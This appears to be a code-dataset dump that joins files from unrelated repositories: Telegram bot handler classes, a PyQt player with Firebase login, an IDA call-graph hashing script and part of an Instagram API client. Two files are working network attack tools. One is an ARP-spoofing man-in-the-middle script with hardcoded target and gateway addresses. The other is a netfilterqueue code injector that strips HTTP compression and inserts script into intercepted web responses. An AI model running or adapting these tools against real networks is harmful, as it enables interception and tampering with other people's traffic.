from telegram.utils.helpers import DefaultValue, DEFAULT_FALSE
from .utils.types import CCT
from .handler import Handler
if TYPE_CHECKING:
from telegram.ext import Dispatcher
RT = TypeVar('RT')
class CommandHandler(Handler[Update, CCT]):
"""Handler class to handle Telegram commands.
Commands are Telegram messages that start with ``/``, optionally followed by an ``@`` and the
bot's name and/or some additional text. The handler will add a ``list`` to the
:class:`CallbackContext` named :attr:`CallbackContext.args`. It will contain a list of strings,
which is the text following the command split on single or consecutive whitespace characters.
By default the handler listens to messages as well as edited messages. To change this behavior
use ``~Filters.update.edited_message`` in the filter argument.
Note:
* :class:`CommandHandler` does *not* handle (edited) channel posts.
* :attr:`pass_user_data` and :attr:`pass_chat_data` determine whether a :obj:`dict` you
can use to keep any data in will be sent to the :attr:`callback` function. Related to
either the user or the chat that the update was sent in. For each update from the same
user or in the same chat, it will be the same :obj:`dict`.
Note that this is DEPRECATED, and you should use context based callbacks. See
https://git.io/fxJuV for more info.
Warning:
When setting ``run_async`` to :obj:`True`, you cannot rely on adding custom
attributes to :class:`telegram.ext.CallbackContext`. See its docs for more info.
Args:
command (:class:`telegram.utils.types.SLT[str]`):
The command or list of commands this handler should listen for.
Limitations are the same as described here https://core.telegram.org/bots#commands
callback (:obj:`callable`): The callback function for this handler. Will be called when
:attr:`check_update` has determined that an update should be processed by this handler.
Callback signature for context based API:
``def callback(update: Update, context: CallbackContext)``
The return value of the callback is usually ignored except for the special case of
:class:`telegram.ext.ConversationHandler`.
filters (:class:`telegram.ext.BaseFilter`, optional): A filter inheriting from
:class:`telegram.ext.filters.BaseFilter`. Standard filters can be found in
:class:`telegram.ext.filters.Filters`. Filters can be combined using bitwise
operators (& for and, | for or, ~ for not).
allow_edited (:obj:`bool`, optional): Determines whether the handler should also accept
edited messages. Default is :obj:`False`.
DEPRECATED: Edited is allowed by default. To change this behavior use
``~Filters.update.edited_message``.
pass_args (:obj:`bool`, optional): Determines whether the handler should be passed the
arguments passed to the command as a keyword argument called ``args``. It will contain
a list of strings, which is the text following the command split on single or
consecutive whitespace characters. Default is :obj:`False`
DEPRECATED: Please switch to context based callbacks.
pass_update_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the :class:`telegram.ext.Updater` and :class:`telegram.ext.Dispatcher`
that contains new updates which can be used to insert updates. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_job_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a
:class:`telegram.ext.JobQueue` instance created by the :class:`telegram.ext.Updater`
which can be used to schedule new jobs. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_user_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``user_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_chat_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``chat_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
Defaults to :obj:`False`.
Raises:
ValueError: when command is too long or has illegal chars.
Attributes:
command (:class:`telegram.utils.types.SLT[str]`):
The command or list of commands this handler should listen for.
Limitations are the same as described here https://core.telegram.org/bots#commands
callback (:obj:`callable`): The callback function for this handler.
filters (:class:`telegram.ext.BaseFilter`): Optional. Only allow updates with these
Filters.
allow_edited (:obj:`bool`): Determines whether the handler should also accept
edited messages.
pass_args (:obj:`bool`): Determines whether the handler should be passed
``args``.
pass_update_queue (:obj:`bool`): Determines whether ``update_queue`` will be
passed to the callback function.
pass_job_queue (:obj:`bool`): Determines whether ``job_queue`` will be passed to
the callback function.
pass_user_data (:obj:`bool`): Determines whether ``user_data`` will be passed to
the callback function.
pass_chat_data (:obj:`bool`): Determines whether ``chat_data`` will be passed to
the callback function.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
"""
__slots__ = ('command', 'filters', 'pass_args')
def __init__(
self,
command: SLT[str],
callback: Callable[[Update, CCT], RT],
filters: BaseFilter = None,
allow_edited: bool = None,
pass_args: bool = False,
pass_update_queue: bool = False,
pass_job_queue: bool = False,
pass_user_data: bool = False,
pass_chat_data: bool = False,
run_async: Union[bool, DefaultValue] = DEFAULT_FALSE,
):
super().__init__(
callback,
pass_update_queue=pass_update_queue,
pass_job_queue=pass_job_queue,
pass_user_data=pass_user_data,
pass_chat_data=pass_chat_data,
run_async=run_async,
)
if isinstance(command, str):
self.command = [command.lower()]
else:
self.command = [x.lower() for x in command]
for comm in self.command:
if not re.match(r'^[\da-z_]{1,32}$', comm):
raise ValueError('Command is not a valid bot command')
if filters:
self.filters = Filters.update.messages & filters
else:
self.filters = Filters.update.messages
if allow_edited is not None:
warnings.warn(
'allow_edited is deprecated. See https://git.io/fxJuV for more info',
TelegramDeprecationWarning,
stacklevel=2,
)
if not allow_edited:
self.filters &= ~Filters.update.edited_message
self.pass_args = pass_args
def check_update(
self, update: object
) -> Optional[Union[bool, Tuple[List[str], Optional[Union[bool, Dict]]]]]:
"""Determines whether an update should be passed to this handlers :attr:`callback`.
Args:
update (:class:`telegram.Update` | :obj:`object`): Incoming update.
Returns:
:obj:`list`: The list of args for the handler.
"""
if isinstance(update, Update) and update.effective_message:
message = update.effective_message
if (
message.entities
and message.entities[0].type == MessageEntity.BOT_COMMAND
and message.entities[0].offset == 0
and message.text
and message.bot
):
command = message.text[1 : message.entities[0].length]
args = message.text.split()[1:]
command_parts = command.split('@')
command_parts.append(message.bot.username)
if not (
command_parts[0].lower() in self.command
and command_parts[1].lower() == message.bot.username.lower()
):
return None
filter_result = self.filters(update)
if filter_result:
return args, filter_result
return False
return None
def collect_optional_args(
self,
dispatcher: 'Dispatcher',
update: Update = None,
check_result: Optional[Union[bool, Tuple[List[str], Optional[bool]]]] = None,
) -> Dict[str, object]:
"""Provide text after the command to the callback the ``args`` argument as list, split on
single whitespaces.
"""
optional_args = super().collect_optional_args(dispatcher, update)
if self.pass_args and isinstance(check_result, tuple):
optional_args['args'] = check_result[0]
return optional_args
def collect_additional_context(
self,
context: CCT,
update: Update,
dispatcher: 'Dispatcher',
check_result: Optional[Union[bool, Tuple[List[str], Optional[bool]]]],
) -> None:
"""Add text after the command to :attr:`CallbackContext.args` as list, split on single
whitespaces and add output of data filters to :attr:`CallbackContext` as well.
"""
if isinstance(check_result, tuple):
context.args = check_result[0]
if isinstance(check_result[1], dict):
context.update(check_result[1])
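# Minimal usage sketch (assumes an Updater named `updater` already exists):
#
#     def start(update, context):
#         update.message.reply_text('Hello!')
#
#     updater.dispatcher.add_handler(CommandHandler('start', start))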
class PrefixHandler(CommandHandler):
"""Handler class to handle custom prefix commands.
    This is an intermediate handler between :class:`MessageHandler` and :class:`CommandHandler`.
It supports configurable commands with the same options as CommandHandler. It will respond to
every combination of :attr:`prefix` and :attr:`command`. It will add a ``list`` to the
:class:`CallbackContext` named :attr:`CallbackContext.args`. It will contain a list of strings,
which is the text following the command split on single or consecutive whitespace characters.
Examples:
Single prefix and command:
.. code:: python
PrefixHandler('!', 'test', callback) # will respond to '!test'.
Multiple prefixes, single command:
.. code:: python
PrefixHandler(['!', '#'], 'test', callback) # will respond to '!test' and '#test'.
Multiple prefixes and commands:
.. code:: python
PrefixHandler(['!', '#'], ['test', 'help'], callback) # will respond to '!test', \
'#test', '!help' and '#help'.
By default the handler listens to messages as well as edited messages. To change this behavior
use ``~Filters.update.edited_message``.
Note:
* :class:`PrefixHandler` does *not* handle (edited) channel posts.
* :attr:`pass_user_data` and :attr:`pass_chat_data` determine whether a :obj:`dict` you
can use to keep any data in will be sent to the :attr:`callback` function. Related to
either the user or the chat that the update was sent in. For each update from the same
user or in the same chat, it will be the same :obj:`dict`.
Note that this is DEPRECATED, and you should use context based callbacks. See
https://git.io/fxJuV for more info.
Warning:
When setting ``run_async`` to :obj:`True`, you cannot rely on adding custom
attributes to :class:`telegram.ext.CallbackContext`. See its docs for more info.
Args:
prefix (:class:`telegram.utils.types.SLT[str]`):
The prefix(es) that will precede :attr:`command`.
command (:class:`telegram.utils.types.SLT[str]`):
The command or list of commands this handler should listen for.
callback (:obj:`callable`): The callback function for this handler. Will be called when
:attr:`check_update` has determined that an update should be processed by this handler.
Callback signature for context based API:
``def callback(update: Update, context: CallbackContext)``
The return value of the callback is usually ignored except for the special case of
:class:`telegram.ext.ConversationHandler`.
filters (:class:`telegram.ext.BaseFilter`, optional): A filter inheriting from
:class:`telegram.ext.filters.BaseFilter`. Standard filters can be found in
:class:`telegram.ext.filters.Filters`. Filters can be combined using bitwise
operators (& for and, | for or, ~ for not).
pass_args (:obj:`bool`, optional): Determines whether the handler should be passed the
arguments passed to the command as a keyword argument called ``args``. It will contain
a list of strings, which is the text following the command split on single or
consecutive whitespace characters. Default is :obj:`False`
DEPRECATED: Please switch to context based callbacks.
pass_update_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the :class:`telegram.ext.Updater` and :class:`telegram.ext.Dispatcher`
that contains new updates which can be used to insert updates. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_job_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a
:class:`telegram.ext.JobQueue` instance created by the :class:`telegram.ext.Updater`
which can be used to schedule new jobs. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_user_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``user_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_chat_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``chat_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
Defaults to :obj:`False`.
Attributes:
callback (:obj:`callable`): The callback function for this handler.
filters (:class:`telegram.ext.BaseFilter`): Optional. Only allow updates with these
Filters.
pass_args (:obj:`bool`): Determines whether the handler should be passed
``args``.
pass_update_queue (:obj:`bool`): Determines whether ``update_queue`` will be
passed to the callback function.
pass_job_queue (:obj:`bool`): Determines whether ``job_queue`` will be passed to
the callback function.
pass_user_data (:obj:`bool`): Determines whether ``user_data`` will be passed to
the callback function.
pass_chat_data (:obj:`bool`): Determines whether ``chat_data`` will be passed to
the callback function.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
"""
# 'prefix' is a class property, & 'command' is included in the superclass, so they're left out.
__slots__ = ('_prefix', '_command', '_commands')
def __init__(
self,
prefix: SLT[str],
command: SLT[str],
callback: Callable[[Update, CCT], RT],
filters: BaseFilter = None,
pass_args: bool = False,
pass_update_queue: bool = False,
pass_job_queue: bool = False,
pass_user_data: bool = False,
pass_chat_data: bool = False,
run_async: Union[bool, DefaultValue] = DEFAULT_FALSE,
):
self._prefix: List[str] = []
self._command: List[str] = []
self._commands: List[str] = []
super().__init__(
'nocommand',
callback,
filters=filters,
allow_edited=None,
pass_args=pass_args,
pass_update_queue=pass_update_queue,
pass_job_queue=pass_job_queue,
pass_user_data=pass_user_data,
pass_chat_data=pass_chat_data,
run_async=run_async,
)
self.prefix = prefix # type: ignore[assignment]
self.command = command # type: ignore[assignment]
self._build_commands()
@property
def prefix(self) -> List[str]:
"""
The prefixes that will precede :attr:`command`.
Returns:
List[:obj:`str`]
"""
return self._prefix
@prefix.setter
def prefix(self, prefix: Union[str, List[str]]) -> None:
if isinstance(prefix, str):
self._prefix = [prefix.lower()]
else:
self._prefix = prefix
self._build_commands()
@property # type: ignore[override]
def command(self) -> List[str]: # type: ignore[override]
"""
The list of commands this handler should listen for.
Returns:
List[:obj:`str`]
"""
return self._command
@command.setter
def command(self, command: Union[str, List[str]]) -> None:
if isinstance(command, str):
self._command = [command.lower()]
else:
self._command = command
self._build_commands()
def _build_commands(self) -> None:
self._commands = [x.lower() + y.lower() for x in self.prefix for y in self.command]
def check_update(
self, update: object
) -> Optional[Union[bool, Tuple[List[str], Optional[Union[bool, Dict]]]]]:
"""Determines whether an update should be passed to this handlers :attr:`callback`.
Args:
update (:class:`telegram.Update` | :obj:`object`): Incoming update.
Returns:
:obj:`list`: The list of args for the handler.
"""
if isinstance(update, Update) and update.effective_message:
message = update.effective_message
if message.text:
text_list = message.text.split()
if text_list[0].lower() not in self._commands:
return None
filter_result = self.filters(update)
if filter_result:
return text_list[1:], filter_result
return False
return None
```
#### File: site-packages/telegram/forcereply.py
```python
from typing import Any
from telegram import ReplyMarkup
class ForceReply(ReplyMarkup):
"""
Upon receiving a message with this object, Telegram clients will display a reply interface to
the user (act as if the user has selected the bot's message and tapped 'Reply'). This can be
extremely useful if you want to create user-friendly step-by-step interfaces without having
to sacrifice privacy mode.
Objects of this class are comparable in terms of equality. Two objects of this class are
considered equal, if their :attr:`selective` is equal.
Args:
selective (:obj:`bool`, optional): Use this parameter if you want to force reply from
specific users only. Targets:
1) Users that are @mentioned in the :attr:`~telegram.Message.text` of the
:class:`telegram.Message` object.
2) If the bot's message is a reply (has ``reply_to_message_id``), sender of the
original message.
input_field_placeholder (:obj:`str`, optional): The placeholder to be shown in the input
field when the reply is active; 1-64 characters.
.. versionadded:: 13.7
**kwargs (:obj:`dict`): Arbitrary keyword arguments.
Attributes:
force_reply (:obj:`True`): Shows reply interface to the user, as if they manually selected
the bots message and tapped 'Reply'.
selective (:obj:`bool`): Optional. Force reply from specific users only.
input_field_placeholder (:obj:`str`): Optional. The placeholder shown in the input
field when the reply is active.
.. versionadded:: 13.7
"""
__slots__ = ('selective', 'force_reply', 'input_field_placeholder', '_id_attrs')
def __init__(
self,
force_reply: bool = True,
selective: bool = False,
input_field_placeholder: str = None,
**_kwargs: Any,
):
# Required
self.force_reply = bool(force_reply)
# Optionals
self.selective = bool(selective)
self.input_field_placeholder = input_field_placeholder
self._id_attrs = (self.selective,)
``` |
{
"source": "0xtz/pyplayer",
"score": 2
} |
#### File: 0xtz/pyplayer/main.py
```python
from index import MainWindow
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5 import QtMultimedia
from PyQt5.uic import *
import pyrebase
import sys
import os
# from main_ui import Ui_MainWindow
MainUI,_ = loadUiType('main.ui')
WINDOW_SIZE = 0
counter = 0
# firebase config
firebaseConfig = { # Put your config from the Firebase website firebase.com ;)
"apiKey" : "",
"authDomain" : "",
"projectId" : "",
"databaseURL":"",
"storageBucket": "",
"messagingSenderId": "",
"appId": "",
"measurementId" : ""
}
firebase = pyrebase.initialize_app(firebaseConfig)
auth = firebase.auth()
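# pyrebase wraps the Firebase Auth REST API; sign_in_with_email_and_password()
# and create_user_with_email_and_password() raise on failure, which the
# login/signup handlers below catch.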
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
class Main(QMainWindow , MainUI):
def __init__(self , parent=None):
super(Main, self).__init__(parent)
QMainWindow.__init__(self)
self.setupUi(self)
self.ui()
self.btns()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def mousePressEvent(self, event):
self.oldPos = event.globalPos()
def mouseMoveEvent(self, event):
        delta = QPoint(event.globalPos() - self.oldPos)
self.move(self.x() + delta.x(), self.y() + delta.y())
self.oldPos = event.globalPos()
def ui(self):
self.setAttribute(Qt.WA_TranslucentBackground)
self.setWindowFlags(Qt.Window | Qt.CustomizeWindowHint)
self.frame_top_1.mouseMoveEvent = self.mouseMoveEvent
def btns(self):
# StackWidget
# {your QPushButton}.clicked.connect(lambda: {your QStackedWidget}.setCurrentWidget({another page}))
self.btn_togle.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_home))
self.btn_music.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_music))
self.btn_goto.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_music))
self.btn_music2.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_music))
self.btn_go_to_setting.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_setting))
self.btn_minimize.clicked.connect(lambda: self.showMinimized() )
self.btn_close.clicked.connect(self.close)
# Restore or maximize your window
def restore_or_maximize_window(self):
# Global windows state
global WINDOW_SIZE
win_status = WINDOW_SIZE
if win_status == 0:
# If the window is not maximized
WINDOW_SIZE = 1
self.showMaximized()
else:
# If the window is on its default size
WINDOW_SIZE = 0
self.showNormal()
# login SCREEN
Mainui,_ = loadUiType('login.ui')
class Login(QMainWindow, Mainui):
def __init__(self , parent=None):
super(Login, self).__init__(parent)
QMainWindow.__init__(self)
self.setupUi(self)
self.ui()
self.btns()
def btns(self):
self.btn_exit.clicked.connect(self.close)
self.btn_to_create.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_create))
self.go_to_login.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_login ))
self.btn_login.clicked.connect(self.loginfunction)
self.btn_creat.clicked.connect(self.create_account)
def ui(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
self.setAttribute(Qt.WA_TranslucentBackground)
self.setWindowFlags(Qt.Window | Qt.CustomizeWindowHint)
self.invalid.setVisible(False)
self.invalid1.setVisible(False)
def loginfunction(self):
email = self.login_user.text()
password = self.login_passwd.text()
try:
auth.sign_in_with_email_and_password(email,password)
main_win = Main()
self.close()
main_win.show()
except:
self.invalid.setVisible(True)
def create_account(self):
if self.creat_passwd1.text() == self.creat_passwd2.text() and self.creat_user.text() != "":
            password = self.creat_passwd1.text()
mail = self.creat_user.text()
try:
auth.create_user_with_email_and_password(mail, password)
                self.stackedWidget.setCurrentWidget(self.pg_login)
except:
                self.invalid1.setVisible(True)
def main():
app = QApplication(sys.argv)
window = Login()
window.show()
app.exec_()
if __name__ == '__main__':
main()
``` |
{
"source": "0xUvaish/ARP-Spoofer",
"score": 3
} |
#### File: 0xUvaish/ARP-Spoofer/arpspoof1.py
```python
import scapy.all as scapy
import time
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, verbose=False)[0]
return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
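    # Send a forged ARP reply (op=2) telling target_ip that spoof_ip now
    # resolves to our MAC (scapy fills hwsrc with ours by default),
    # poisoning the target's ARP cache.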
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)
def restore(destination_ip, source_ip):
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False)
target_ip = "192.168.1.121"
gateway_ip = "192.168.1.103"
try:
sent_packets_count = 0
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
sent_packets_count = sent_packets_count + 2
print("\r[+] Packets sent: " + str(sent_packets_count), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\n[-] Detected CTRL + C ... Resetting ARP tables..... Please wait.\n")
restore(target_ip, gateway_ip)
restore(gateway_ip, target_ip)
print("[✓] Restored successfully")
``` |
{
"source": "0xUvaish/Code-Injector",
"score": 3
} |
#### File: 0xUvaish/Code-Injector/code_injector1.py
```python
import scapy.all as scapy
import netfilterqueue
import re
def set_load(packet, load):
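    # Replace the TCP payload; deleting the length and checksum fields
    # makes scapy recompute them for the modified packet when it is sent.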
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
print("[+] Request")
modified_load = re.sub("Accept-Encoding:.*?\\r\\n", "", scapy_packet[scapy.Raw].load)
new_packet = set_load(scapy_packet, modified_load)
packet.set_payload(str(new_packet))
elif scapy_packet[scapy.TCP].sport == 80:
print("[+] Response")
            modified_load = scapy_packet[scapy.Raw].load.replace("</body>", "<script>alert('test');</script></body>")
new_packet = set_load(scapy_packet, modified_load)
packet.set_payload(str(new_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
``` |
{
"source": "0xvico/graph-hash",
"score": 2
} |
#### File: 0xvico/graph-hash/graph_hash.py
```python
import idc
import idautils
import idaapi
import sys
import os
import hashlib
try:
import ssdeep
except:
pass
class CallGraph:
def __init__(self):
self.num_func = 0
self.graph_pattern = ''
self.roots = []
self.vertices = {}
self.min_ea = idaapi.cvar.inf.minEA
self.max_ea = idaapi.cvar.inf.maxEA
self.ea_size = self.max_ea - self.min_ea
def add_vertex(self, ea, func_type):
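        # Encode each function as two bytes: its address bucket (0-15, i.e.
        # relative position within the binary) plus its type
        # (0 normal, 1 library, 2 imported, 3 thunk).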
        address_block = (ea - self.min_ea) * 16 // self.ea_size
vertex_value = chr(address_block) + chr(func_type)
self.vertices[ea] = {'index': self.num_func, 'func_type': func_type, 'value': vertex_value, 'targets': [], 'is_visited': 0}
self.num_func += 1
def add_root(self, ea):
self.roots.append(ea)
def set_roots(self):
for ea in self.vertices:
for target_ea in self.vertices[ea]['targets']:
if target_ea in self.roots:
self.roots.remove(target_ea)
def set_value(self):
for ea in self.vertices:
            address_block = (ea - self.min_ea) * 16 // self.ea_size
func_type = self.vertices[ea]['func_type']
self.vertices[ea]['value'] = chr(address_block) + chr(func_type)
def connect_vertex(self, source_ea, target_ea):
if not target_ea in self.vertices[source_ea]['targets']:
self.vertices[source_ea]['targets'].append(target_ea)
def build_graph_pattern(self, vertex):
self.graph_pattern += self.vertices[vertex]['value']
if self.vertices[vertex]['is_visited'] == 0:
self.vertices[vertex]['is_visited'] = 1
for target_ea in self.vertices[vertex]['targets']:
self.build_graph_pattern(target_ea)
def get_graph_md5(self):
m = hashlib.md5()
m.update(self.graph_pattern)
return m.hexdigest()
def get_graph_sha1(self):
m = hashlib.sha1()
m.update(self.graph_pattern)
return m.hexdigest()
def get_graph_sha256(self):
m = hashlib.sha256()
m.update(self.graph_pattern)
return m.hexdigest()
def get_graph_ssdeep(self):
if 'ssdeep' in sys.modules:
return ssdeep.hash(self.graph_pattern)
else:
return 'No ssdeep Modules. Please Install ssdeep.'
def main():
imp_funcs = []
xrefs = []
cg = CallGraph()
file_name = idc.get_root_filename()
file_path = idc.GetInputFilePath()
def get_file_ssdeep():
if 'ssdeep' in sys.modules:
return ssdeep.hash_from_file(file_path)
else:
return 'No ssdeep Modules. Please Install ssdeep.'
def imp_cb(ea, name, ord):
imp_funcs.append(ea)
return True
if 'batch' in idc.ARGV:
idaapi.autoWait()
for fea in Functions():
func_flags = get_func_flags(fea)
# NORMAL = 0
# LIBRARY = 1
# IMPORTED = 2
# THUNK = 3
if func_flags & FUNC_LIB:
func_type = 1
elif func_flags & FUNC_THUNK:
func_type = 3
else:
func_type = 0
cg.add_vertex(fea, func_type)
cg.add_root(fea)
items = FuncItems(fea)
for item in items:
for xref in XrefsFrom(item, 0):
# https://www.hex-rays.com/products/ida/support/idadoc/313.shtml
if xref.type != fl_F:
xrefs.append([fea, xref.to])
# List Import Functions and Add to cg
num_imp_module = idaapi.get_import_module_qty()
for i in range(0, num_imp_module):
idaapi.enum_import_names(i, imp_cb)
imp_funcs.sort()
for imp_func_ea in imp_funcs:
cg.add_vertex(imp_func_ea, 2)
for xref in xrefs:
if xref[1] in cg.vertices:
cg.connect_vertex(xref[0], xref[1])
cg.set_roots()
for root in cg.roots:
cg.build_graph_pattern(root)
if len(idc.ARGV) == 0:
print('Graph MD5: %s' % cg.get_graph_md5())
print('Graph SHA1: %s' % cg.get_graph_sha1())
print('Graph SHA256: %s' % cg.get_graph_sha256())
print('Graph SSDEEP: %s' % cg.get_graph_ssdeep())
print('File SSDEEP: %s' % get_file_ssdeep())
if 'out_pattern' in idc.ARGV:
if not os.path.isdir('./out'):
os.mkdir('./out')
f = open('./out/' + file_name + '.bin', 'wb')
f.write(cg.graph_pattern)
f.close()
if 'batch' in idc.ARGV:
if not os.path.isdir('./out'):
os.mkdir('./out')
f = open('./out/result', 'a+')
f.write('%s,%s,%s,%s\n' % (file_name, cg.get_graph_md5(), cg.get_graph_ssdeep(), get_file_ssdeep()))
f.close()
idc.Exit(0)
if __name__ == '__main__':
main()
``` |
{
"source": "0xv/instagram_private_api",
"score": 2
} |
#### File: instagram_private_api/endpoints/friendships.py
```python
from ..compatpatch import ClientCompatPatch
class FriendshipsEndpointsMixin(object):
def autocomplete_user_list(self):
"""User list for autocomplete"""
res = self._call_api(
'friendships/autocomplete_user_list/',
query={'followinfo': 'True', 'version': '2'})
if self.auto_patch:
[ClientCompatPatch.list_user(user, drop_incompat_keys=self.drop_incompat_keys)
for user in res['users']]
return res
def user_following(self, user_id, **kwargs):
"""
Get user followings
:param user_id:
:param kwargs:
- **max_id**: For pagination
:return:
"""
endpoint = 'friendships/%(user_id)s/following/' % {'user_id': user_id}
query = {
'rank_token': self.rank_token,
}
query.update(kwargs)
res = self._call_api(endpoint, query=query)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def user_followers(self, user_id, **kwargs):
"""
Get user followers
:param user_id:
:param kwargs:
- **max_id**: For pagination
:return:
"""
endpoint = 'friendships/%(user_id)s/followers/' % {'user_id': user_id}
query = {
'rank_token': self.rank_token,
}
query.update(kwargs)
res = self._call_api(endpoint, query=query)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def friendships_pending(self):
"""Get pending follow requests"""
res = self._call_api('friendships/pending/')
if self.auto_patch and res.get('users'):
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def friendships_show(self, user_id):
"""
Get friendship status with user id
:param user_id:
:return:
.. code-block:: javascript
{
"status": "ok",
"incoming_request": false,
"is_blocking_reel": false,
"followed_by": false,
"is_muting_reel": false,
"outgoing_request": false,
"following": false,
"blocking": false,
"is_private": false
}
"""
endpoint = 'friendships/show/%(user_id)s/' % {'user_id': user_id}
res = self._call_api(endpoint)
return res
def friendships_show_many(self, user_ids):
"""
        Get friendship status with multiple user ids
:param user_ids: list of user ids
:return:
.. code-block:: javascript
{
"status": "ok",
"friendship_statuses": {
"123456789": {
"following": false,
"incoming_request": true,
"outgoing_request": false,
"is_private": false
}
}
}
"""
if isinstance(user_ids, str):
user_ids = [user_ids]
params = {
'_uuid': self.uuid,
'_csrftoken': self.csrftoken,
'user_ids': ','.join(user_ids)
}
res = self._call_api('friendships/show_many/', params=params, unsigned=True)
return res
def friendships_create(self, user_id):
"""
Follow a user
:param user_id: User id
:return:
.. code-block:: javascript
{
"status": "ok",
"friendship_status": {
"incoming_request": false,
"followed_by": false,
"outgoing_request": false,
"following": true,
"blocking": false,
"is_private": false
}
}
"""
endpoint = 'friendships/create/%(user_id)s/' % {'user_id': user_id}
params = {'user_id': user_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def friendships_destroy(self, user_id, **kwargs):
"""
Unfollow a user
:param user_id: User id
:param kwargs:
:return:
.. code-block:: javascript
{
"status": "ok",
"incoming_request": false,
"is_blocking_reel": false,
"followed_by": false,
"is_muting_reel": false,
"outgoing_request": false,
"following": false,
"blocking": false,
"is_private": false
}
"""
endpoint = 'friendships/destroy/%(user_id)s/' % {'user_id': user_id}
params = {'user_id': user_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def friendships_block(self, user_id):
"""
Block a user
:param user_id: User id
:return:
.. code-block:: javascript
{
"status": "ok",
"incoming_request": false,
"is_blocking_reel": false,
"followed_by": false,
"is_muting_reel": false,
"outgoing_request": false,
"following": false,
"blocking": true,
"is_private": false
}
"""
endpoint = 'friendships/block/%(user_id)s/' % {'user_id': user_id}
params = {'user_id': user_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
```
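A minimal usage sketch for the mixin above, assuming the package's composed `Client` (which supplies `_call_api`, `auto_patch`, and friends); the credentials and user id are placeholders:
```python
from instagram_private_api import Client

api = Client('my_username', 'my_password')       # placeholder credentials
status = api.friendships_show('123456789')       # friendship flags for one user id
followers = api.user_followers('123456789')      # first page of followers
print(status.get('following'), len(followers.get('users', [])))
```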
#### File: instagram_private_api/endpoints/live.py
```python
from ..utils import gen_user_breadcrumb
from ..compatpatch import ClientCompatPatch
class LiveEndpointsMixin(object):
def broadcast_like(self, broadcast_id, like_count=1):
"""
Like a live broadcast
:param broadcast_id: Broadcast id
:param like_count:
:return:
"""
if like_count < 1 or like_count > 5:
raise ValueError('Invalid like_count')
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/like/' % {'broadcast_id': broadcast_id}
params = {'user_like_count': str(like_count)}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def broadcast_like_count(self, broadcast_id, like_ts=0):
"""
Get a live broadcast's like count
:param broadcast_id: Broadcast id
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/get_like_count/' % {'broadcast_id': broadcast_id}
return self._call_api(endpoint, query={'like_ts': like_ts})
def broadcast_comments(self, broadcast_id, last_comment_ts=0):
"""
Get a live broadcast's latest comments
:param broadcast_id: Broadcast id
